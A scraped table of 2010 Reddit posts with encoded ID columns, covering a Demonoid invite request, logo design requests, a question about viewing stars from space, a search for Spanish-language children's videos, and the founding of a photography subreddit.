I've missed every registration period, I dunno, ever. I'd appreciate an invite to demonoid if anyone can spare one. | r/demonoid | post | r/Demonoid | 2010-02-01 | Z0FBQUFBQm5LN1VxMUl2SVREcERUb242cHBQWnhSOXg0c2FMWXFlZGtkUTZrRkpGVjJ3V1hYQy1sNUhOZk5JdlJlT0xGdG5FdmFEUWpJU0ZSOW1sWUE3aW4tOXluQTZQZHc9PQ== | Z0FBQUFBQm5LN1ZoUlRScFAtOFk3RVJkS1UxVU9kUC1CNFJKX3VydVVBRXpBNElIY1dxLTU2a0dFWnI2RlhVQWRPMkNfZkdJR19RcXlyRndTd3NOT29uNHZWOHZuR2VRNmwwMTA5UlctODZYSTVsZ0lEdFNhcUdER2xuTjJ4Z3dMcjRSSjRHRjJucXk0bkVyQVJfMHJWZ0tPT2N3b1NCUkl4b0NsUVZNQ1RYV3psdXV0WEZOSDU0PQ== |
If someone shows me the essentials for a logo (size, file type) I could likely tackle logos quite easily... I am just programming retarded. | r/logo | post | r/logo | 2010-02-02 | Z0FBQUFBQm5LN1VxbDR0cGZxMVlOZnY4MnVtcm9qM3JVNi12SDRSN0hrME9lQ3RwSzRWU0tQcHFleW5IbFZGMDdXZFNBR2tzNUl3cTdDZTMtSFF6ek5jOGI3aUpDSi1hSXc9PQ== | Z0FBQUFBQm5LN1ZoaXJoc1Zqb0E5enNuYXpPcWNHbXVJV3dBT3d5a0duRWVvV2xEVHF0dGQ3S29GVDVDckFMTE5VYlVqN1QxU1U0ajB3R1ZkYU5pbWhPc1YyU1ZpVmFnSFRIaDBwSjFhY3d4Y05iNE5KQk5Pd2paSjNOdzgtTF9mZzFnbng3TVZFNnJ0dFowVk1wNmtqcllpZVJPdU9WSUdSZzB5ZklfNFJ6SXBET21oX0VnbnNmUVZ1Q3QtVXJGRzM3WWJCMS13RDRf |
I'm wondering what the stars look like from space with the naked eye. I'm looking for something not through a telescope. I just want an idea of the scope of what you'd see.
Thanks! | r/astro | post | r/astro | 2010-02-08 | Z0FBQUFBQm5LN1VxcWtZejJZRXBWbU96RjRFN0lrTFJ1WVJIR0w5QTUwcmdZdnlJaFlKNmFueVE5UGoxcXpoR3RObU1GdmlMM1Q5cW1tM1Nia2cxMWtlRTVkS21EaW5lcnRhcTZKY3VqYlRTTVpNcV9BZWdsVUE9 | Z0FBQUFBQm5LN1ZoU0xnUTJ3YldKUzJoWWdvVWkycjdCZXdRSVlXbWxnUG80WGNhVzdjRVp0NlYxbGYyanhNLWhNb3NaZUJ3MERtamNkd2xfa2xkN0tSai1LZnUwemppRXRIM1lqQXB1dUhHM2V3ZkFxTFJ0WVFNZ2R3ZlRZS0JfYTRnUU1MNExlRVpnbHoyYlR1T1Zpeks0MDZZckJSNThmcGVWU3N1aFBSbkJSYm53MlNQN1ZoRkJYTnpZS0xIaEhzNHVZNmxub1Vj |
I originally posted the request at [r/Favors](http://www.reddit.com/r/Favors/comments/b0v3o/request_i_am_a_moderator_for_the_anthropology/) and someone pointed me to this community.
We came up with several ideas such as the alien in a pith helmet, Indiana Jones, a skeleton, the gradually evolving hominins that end with an alien, or something indigenous. Also, if you have any experience with anthropology feel free to get creative.
Thank you for your help. | r/logo | post | r/logo | 2010-02-11 | Z0FBQUFBQm5LN1VxRDZ1WjhCUVhXVlN6Z0dENG45aWRqWWhRSVpqVjE5dWZSRzVlMUk0czduTHhBNm1aN1U2ajBmNktodnZXYXdLRnk0aXFPems2Tl9pc0oxUWNzR3ZVZFkwTlZxWEtTMWNyY2lHczMwWG45Slk9 | Z0FBQUFBQm5LN1ZoMC1BR0tGUTdkaVVOcHNIYUFEb0p1OFdBTldGaUxldldleF9UbWVhckcxTjQyRjhWZzBndkF5X3JsT3hfYWtxdHhmRmhnWVlTaVNWSWdBTVN3NzhQa0Z2aC1vY1RfcWZqclJtN0dWYkp5Mkk0cUpOWEM2SllCa2VkV0NNLWV4Vm1hUERnQlpwVGdLQ1lQS0F5Y0VJclpRNU95VFZiOU1OcmQtOVlBd1VMNXdSTFZReklLZ1p3cjI3X1FvckpmWHFi |
My grandson is semi-trilingual. Well, okay, he's only two, so he's not very lingual at all yet, but my daughter is committed to raising him to be bilingual. He speaks English and Spanish, with a smattering of Polish vocabulary, here and there. His favorite music is mostly Spanish. He's addicted to YouTube.
I want to find him some educational videos in and for Spanish.
He's very advanced for his age, and his English vocabulary is more than twice that of the average three-year old. His Spanish vocabulary is not as broad, but it is still impressive.
I want to contribute to his mother's efforts. I'm looking for Spanish-language equivalents of Sesame Street and things like that.
I've tried lots of searching, but haven't had much success. I have some audio stuff, but he really likes to watch videos, and he definitely learns plenty from what he watches. You should see/hear him singing "Playas de Barbate" by Chambao or "No + Llora" by Bebe. In addition to being amazingly adorable, it's also surprisingly accurate.
Please help me, r/LaNL. I want this young man to have the broadest possible horizons in his life. Spanish-only would be okay, but English-Spanish combination would be best. Colors, weather, things like that.
I have no conscience issues about using BitTorrent for something like this, if that's the only way I can get them now, when he needs them. | r/learnanewlanguage | post | r/LearnANewLanguage | 2010-02-11 | Z0FBQUFBQm5LN1VxWVJDRS0tX01IUHVBZEtISUJjaUZxZTRfNWxfZUZpMk4xa0tMeW90Y3pPUlJacDJnRWtyY1RhWmxxcXRqdElyeVppRmMyLWg3OUhqY1V4SHAyLVFpN3c9PQ== | Z0FBQUFBQm5LN1ZoODFQdk9NVTR6bmZXMGVhVUI5b1lZZlBIWS1sZ2RzMTY1OHQydWxwTE5hSnFnTUZfR01vU0JrbWlRd0VORlFjTGxiWUdfUGNQNFJTU0pubWRhMVhOZDlUTS1CZ0lnSzdCOWtWQTJ3NmpwaHlDV0V5ZldvSV9EdWV2QmZQSDRUT1ZSUXVxVWRnSlZBUzZBd3E4LUNDd2Rvc0FGN24yUm8xcUpuOHUtNFFlT3VlQWh6MzFnQUg2eUZEZ09pOGxZQTFaR3U0ZV81a2RPeGtleXk2Rmt3Y19mdz09 |
[Here](http://imgur.com/zy6rZ) is the logo's original size.
[Here](http://imgur.com/Hf32c) is the scaled down version for the site.
I was looking through reddit's past logo's and I saw that Reddit hasn't ever had a presidents day logo. I got super bored last night so I decided to throw one up. Tell me what you think! Feel free to give constructive criticism. Hope you like them.
PS - I'm not too good with PS. Everything is self taught and VERY basic. | r/logo | post | r/logo | 2010-02-12 | Z0FBQUFBQm5LN1VxOHRYSjdhZHotd2l0Q0tDTHdkdjFjTWI2NEQyTTNFZm5RS0xWTnZRX0tORXEwYWRYZUx6Y0d6R2RtaWVLeXBnaWhvT2d5QndjZVN6VVppbTZRdXRSbUE9PQ== | Z0FBQUFBQm5LN1ZocEtmWGhrZ1FWWGpONEFOaHlZQUxGWWUyRU40UHl2NkdvLWJRa0RYOHFCaVdHWmw2cTZLUE1pVmx2ODlOejBSSmllNi1obndUMENucHhtWkUwYWJMc0w5TlJWMjJ1QUlpZl9mMmpNUUxIUjJtbnR5Yks1bXUwX3VVR1loYVE0Ukl6NFV5UzY2N3VMZHlmZGgtcVFnTzFpTXZDcnVlMDYzVDQzQVBnTHNoWkFRbjY5ekZmTjZOY3dMMVd6WVVub3F1 |
Just following along with others from zeabird's [post](http://www.reddit.com/r/photography/comments/b1oq1/anyone_think_we_should_start_a_reddit_photography/).
I am an amateur / hobby photographer and I would greatly appreciate this subreddit! Perhaps we can talk about what could be included here, maybe in some sort of organized way, like CarlH's programming [subreddit](http://www.reddit.com/r/carlhprogramming).
| r/photoit | post | r/photoit | 2010-02-13 | Z0FBQUFBQm5LN1VxUFVaeXdleUFGcncyZTF3bDdUdFpJeDJ3SDA5Uzk4NF80c1VrMjJ2TmhFR3ZuUkxxY1ZOekRldFVJWnVFc0VhYkVfcVNJT19xTVZyVXJmc3FQVVotWkE9PQ== | Z0FBQUFBQm5LN1ZoRUF6SlBxWHB6SzNyT3FuNGNhQlpoTWFEeGF5d2lyX2hxRUxlUC1zeWpiRURPT0kzUm5VYkJOZ1ljZmU0VmRVeWU4UTRJVFJnVk9OWjk4ZVdPOV9SRkwyX2pHZ3RJWTE4UG82Tkx0T0RleWEwYXI5UlZpdllORFBWMTRJNTFlM1dlUmpQYnN0Q0FrNDM2SmZQbzd0aEJ0RGNjWkh1UTl0NURNUHBoMzU2ZlFnPQ== |
This way we can organize and separate lessons and assignments in an order that actually makes sense, allowing us to have proper numbering on the lessons and not have an overabundance of current assignments out. (ie: Six ideas one week instead of spreading them out over time and allowing more people to submit).
Thanks =) | r/photoit | post | r/photoit | 2010-02-14 | Z0FBQUFBQm5LN1VxSnU5YlRKTWNxRlV6ei1rQjViV2NyV1JBS1cyOUVkdG9mTjJuS1VCTk9xc1UtZnozeG5YZEptOXA1ODJJVXFCMjd5Uk1HYTloNE5uMWVDQndyb1BZeEE9PQ== | Z0FBQUFBQm5LN1ZobWtJbHhpdHV2OTVBd2gyWHZDaWRlTkppdTRKajdkWXY4alAwcTU1My1FNG96VE9jQ3hIbnhPblQzU254cHJOcTBFcmtxeThwU1pGSVN3a1RRdWpZUlNILWR4QnV3STRiUnhsc0VPWXVDbmNpWUhKUnRUS28xUlZtZUpyazY2Z2Z6ZnVRazkwQ0hFVGJRQ3VNZGNRQmJYZkxkSmw3Y25NSUNJa1BhV1JMbTE3anRLZVpNUGVqMUNnVkJSQ2VicXR2 |
Subsets and Splits